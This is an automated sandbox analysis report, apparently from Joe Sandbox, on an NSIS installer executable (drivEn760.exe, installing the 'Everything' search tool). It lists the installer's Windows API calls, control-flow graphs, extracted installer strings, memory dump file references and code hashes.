                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043C7
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                                            • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                                            • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSendShow$Long$CallbackDispatcherMenuUser$ClassDestroyEnableEnabledSystemTextlstrlen
                                                                                                            • String ID: H7B$pg
                                                                                                            • API String ID: 3964124867-2635604521
                                                                                                            • Opcode ID: 03bd59434f1118aca5a4335eee9f8b8dcbc4747f0f915f75e11a672c2a66a84c
                                                                                                            • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                                            • Opcode Fuzzy Hash: 03bd59434f1118aca5a4335eee9f8b8dcbc4747f0f915f75e11a672c2a66a84c
                                                                                                            • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 299 403d17-403d2f call 406a35 302 403d31-403d41 call 4065af 299->302 303 403d43-403d7a call 406536 299->303 312 403d9d-403dc6 call 403fed call 40603f 302->312 308 403d92-403d98 lstrcatW 303->308 309 403d7c-403d8d call 406536 303->309 308->312 309->308 317 403e58-403e60 call 40603f 312->317 318 403dcc-403dd1 312->318 324 403e62-403e69 call 4066a5 317->324 325 403e6e-403e93 LoadImageW 317->325 318->317 320 403dd7-403dff call 406536 318->320 320->317 326 403e01-403e05 320->326 324->325 328 403f14-403f1c call 40140b 325->328 329 403e95-403ec5 RegisterClassW 325->329 330 403e17-403e23 lstrlenW 326->330 331 403e07-403e14 call 405f64 326->331 342 403f26-403f31 call 403fed 328->342 343 403f1e-403f21 328->343 332 403fe3 329->332 333 403ecb-403f0f SystemParametersInfoW CreateWindowExW 329->333 337 403e25-403e33 lstrcmpiW 330->337 338 403e4b-403e53 call 405f37 call 406668 330->338 331->330 336 403fe5-403fec 332->336 333->328 337->338 341 403e35-403e3f GetFileAttributesW 337->341 338->317 345 403e41-403e43 341->345 346 403e45-403e46 call 405f83 341->346 352 403f37-403f51 ShowWindow call 4069c5 342->352 353 403fba-403fbb call 40579d 342->353 343->336 345->338 345->346 346->338 358 403f53-403f58 call 4069c5 352->358 359 403f5d-403f6f GetClassInfoW 352->359 357 403fc0-403fc2 353->357 360 403fc4-403fca 357->360 361 403fdc-403fde call 40140b 357->361 358->359 364 403f71-403f81 GetClassInfoW RegisterClassW 359->364 365 403f87-403faa DialogBoxParamW call 40140b 359->365 360->343 366 403fd0-403fd7 call 40140b 360->366 361->332 364->365 370 403faf-403fb8 call 403c67 365->370 366->343 370->336
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                              • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                            • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D98
                                                                                                            • lstrlenW.KERNEL32(Delete on reboot: ,?,?,?,Delete on reboot: ,00000000,C:\Program Files\Everything,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75923420), ref: 00403E18
                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Delete on reboot: ,?,?,?,Delete on reboot: ,00000000,C:\Program Files\Everything,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                                            • GetFileAttributesW.KERNEL32(Delete on reboot: ,?,00000000,?), ref: 00403E36
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Program Files\Everything), ref: 00403E7F
                                                                                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                                            • RegisterClassW.USER32(00429200), ref: 00403EBC
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                                                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                                                                                            • RegisterClassW.USER32(00429200), ref: 00403F81
                                                                                                            • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Program Files\Everything$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Delete on reboot: $H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-2359460922
                                                                                                            • Opcode ID: 175fff3e437390754c144b33b118bf01c4ebd27f56e5315c1179d745415b4b91
                                                                                                            • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                                            • Opcode Fuzzy Hash: 175fff3e437390754c144b33b118bf01c4ebd27f56e5315c1179d745415b4b91
                                                                                                            • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 373 404783-404795 374 4048b5-4048c2 373->374 375 40479b-4047a3 373->375 376 4048c4-4048cd 374->376 377 40491f-404923 374->377 378 4047a5-4047b4 375->378 379 4047b6-4047da 375->379 380 4048d3-4048d9 376->380 381 4049f8 376->381 384 4049e9-4049f0 377->384 385 404929-404941 GetDlgItem 377->385 378->379 382 4047e3-40485e call 4045c4 * 2 CheckDlgButton call 4045e6 GetDlgItem call 4045f9 SendMessageW 379->382 383 4047dc 379->383 380->381 386 4048df-4048ea 380->386 389 4049fb-404a02 call 40462b 381->389 415 404860-404863 GetSysColor 382->415 416 404869-4048b0 SendMessageW * 2 lstrlenW SendMessageW * 2 382->416 383->382 384->381 388 4049f2 384->388 390 404943-40494a 385->390 391 4049aa-4049b1 385->391 386->381 394 4048f0-40491a GetDlgItem SendMessageW call 4045e6 call 404a0e 386->394 388->381 397 404a07-404a0b 389->397 390->391 392 40494c-404967 390->392 391->389 393 4049b3-4049ba 391->393 392->391 398 404969-4049a7 SendMessageW LoadCursorW SetCursor call 404a32 LoadCursorW SetCursor 392->398 393->389 399 4049bc-4049c0 393->399 394->377 398->391 403 4049d2-4049d6 399->403 404 4049c2-4049d0 SendMessageW 399->404 408 4049e4-4049e7 403->408 409 4049d8-4049e2 SendMessageW 403->409 404->403 408->397 409->408 415->416 416->397
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                                            • GetSysColor.USER32(?), ref: 00404863
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                                                                            • SendMessageW.USER32(00000000), ref: 00404906
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                                            • SetCursor.USER32(00000000), ref: 00404985
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                                            • SetCursor.USER32(00000000), ref: 004049A1
                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: Delete on reboot: $N$pg
                                                                                                            • API String ID: 3103080414-4281084878
                                                                                                            • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                            • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                                            • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                            • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 520 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 523 403120-403125 520->523 524 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 520->524 525 40336a-40336e 523->525 532 403243-403251 call 40302e 524->532 533 40315e 524->533 539 403322-403327 532->539 540 403257-40325a 532->540 535 403163-40317a 533->535 537 40317c 535->537 538 40317e-403187 call 4035e2 535->538 537->538 546 40318d-403194 538->546 547 4032de-4032e6 call 40302e 538->547 539->525 542 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 540->542 543 40325c-403274 call 4035f8 call 4035e2 540->543 571 4032d4-4032d9 542->571 572 4032e8-403318 call 4035f8 call 403371 542->572 543->539 566 40327a-403280 543->566 551 403210-403214 546->551 552 403196-4031aa call 406113 546->552 547->539 556 403216-40321d call 40302e 551->556 557 40321e-403224 551->557 552->557 569 4031ac-4031b3 552->569 556->557 562 403233-40323b 557->562 563 403226-403230 call 406b22 557->563 562->535 570 403241 562->570 563->562 566->539 566->542 569->557 575 4031b5-4031bc 569->575 570->532 571->525 581 40331d-403320 572->581 575->557 577 4031be-4031c5 575->577 577->557 578 4031c7-4031ce 577->578 578->557 580 4031d0-4031f0 578->580 580->539 582 4031f6-4031fa 580->582 581->539 583 403329-40333a 581->583 584 403202-40320a 582->584 585 4031fc-403200 582->585 586 403342-403347 583->586 587 40333c 583->587 584->557 588 40320c-40320e 584->588 585->570 585->584 589 403348-40334e 586->589 587->586 588->557 589->589 590 403350-403368 call 406113 589->590 590->525
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 004030E4
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\drivEn760.exe,00000400), ref: 00403100
                                                                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Local\Temp\drivEn760.exe,80000000,00000003), ref: 0040615C
                                                                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\drivEn760.exe,C:\Users\user\AppData\Local\Temp\drivEn760.exe,80000000,00000003), ref: 00403149
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\drivEn760.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-1796515608
                                                                                                            • Opcode ID: 487c01b2530aec0f8e4330eaee99da1ec2838499d384e0efae62734bcdb7603c
                                                                                                            • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                                            • Opcode Fuzzy Hash: 487c01b2530aec0f8e4330eaee99da1ec2838499d384e0efae62734bcdb7603c
                                                                                                            • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 593 4066a5-4066b0 594 4066b2-4066c1 593->594 595 4066c3-4066d9 593->595 594->595 596 4066f1-4066fa 595->596 597 4066db-4066e8 595->597 599 406700 596->599 600 4068d5-4068e0 596->600 597->596 598 4066ea-4066ed 597->598 598->596 601 406705-406712 599->601 602 4068e2-4068e6 call 406668 600->602 603 4068eb-4068ec 600->603 601->600 604 406718-406721 601->604 602->603 606 4068b3 604->606 607 406727-406764 604->607 610 4068c1-4068c4 606->610 611 4068b5-4068bf 606->611 608 406857-40685c 607->608 609 40676a-406771 607->609 615 40685e-406864 608->615 616 40688f-406894 608->616 612 406773-406775 609->612 613 406776-406778 609->613 614 4068c6-4068cf 610->614 611->614 612->613 617 4067b5-4067b8 613->617 618 40677a-406798 call 406536 613->618 614->600 621 406702 614->621 622 406874-406880 call 406668 615->622 623 406866-406872 call 4065af 615->623 619 4068a3-4068b1 lstrlenW 616->619 620 406896-40689e call 4066a5 616->620 627 4067c8-4067cb 617->627 628 4067ba-4067c6 GetSystemDirectoryW 617->628 631 40679d-4067a1 618->631 619->614 620->619 621->601 630 406885-40688b 622->630 623->630 633 406834-406836 627->633 634 4067cd-4067db GetWindowsDirectoryW 627->634 632 406838-40683c 628->632 630->619 636 40688d 630->636 638 4067a7-4067b0 call 4066a5 631->638 639 40683e-406842 631->639 632->639 640 40684f-406855 call 4068ef 632->640 633->632 637 4067dd-4067e5 633->637 634->633 636->640 644 4067e7-4067fa 637->644 645 4067fc-406812 SHGetSpecialFolderLocation 637->645 638->632 639->640 642 406844-40684a lstrcatW 639->642 640->619 642->640 644->632 644->645 646 406830 645->646 647 406814-40682e SHGetPathFromIDListW CoTaskMemFree 645->647 646->633 647->632 647->646
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(Delete on reboot: ,00000400), ref: 004067C0
                                                                                                            • GetWindowsDirectoryW.KERNEL32(Delete on reboot: ,00000400,00000000,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,?,00405701,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                                            • lstrcatW.KERNEL32(Delete on reboot: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                            • lstrlenW.KERNEL32(Delete on reboot: ,00000000,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,?,00405701,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000), ref: 004068A4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                            • String ID: Delete on reboot: $Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 4260037668-320855418
                                                                                                            • Opcode ID: 0bd6399ae7995d446be385d385625ed2a82a790064083a211d8114e5b0378967
                                                                                                            • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                                            • Opcode Fuzzy Hash: 0bd6399ae7995d446be385d385625ed2a82a790064083a211d8114e5b0378967
                                                                                                            • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 715 40176f-401794 call 402da6 call 405fae 720 401796-40179c call 406668 715->720 721 40179e-4017b0 call 406668 call 405f37 lstrcatW 715->721 726 4017b5-4017b6 call 4068ef 720->726 721->726 730 4017bb-4017bf 726->730 731 4017c1-4017cb call 40699e 730->731 732 4017f2-4017f5 730->732 739 4017dd-4017ef 731->739 740 4017cd-4017db CompareFileTime 731->740 733 4017f7-4017f8 call 406133 732->733 734 4017fd-401819 call 406158 732->734 733->734 742 40181b-40181e 734->742 743 40188d-4018b6 call 4056ca call 403371 734->743 739->732 740->739 744 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 742->744 745 40186f-401879 call 4056ca 742->745 755 4018b8-4018bc 743->755 756 4018be-4018ca SetFileTime 743->756 744->730 777 401864-401865 744->777 757 401882-401888 745->757 755->756 759 4018d0-4018db CloseHandle 755->759 756->759 760 402c33 757->760 762 4018e1-4018e4 759->762 763 402c2a-402c2d 759->763 764 402c35-402c39 760->764 767 4018e6-4018f7 call 4066a5 lstrcatW 762->767 768 4018f9-4018fc call 4066a5 762->768 763->760 774 401901-4023a2 call 405cc8 767->774 768->774 774->763 774->764 777->757 779 401867-401868 777->779 779->745
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,"C:\Program Files\Everything\Everything.exe",C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,"C:\Program Files\Everything\Everything.exe","C:\Program Files\Everything\Everything.exe",00000000,00000000,"C:\Program Files\Everything\Everything.exe",C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,004030A8,004030A8,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000), ref: 00405725
                                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\), ref: 00405737
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
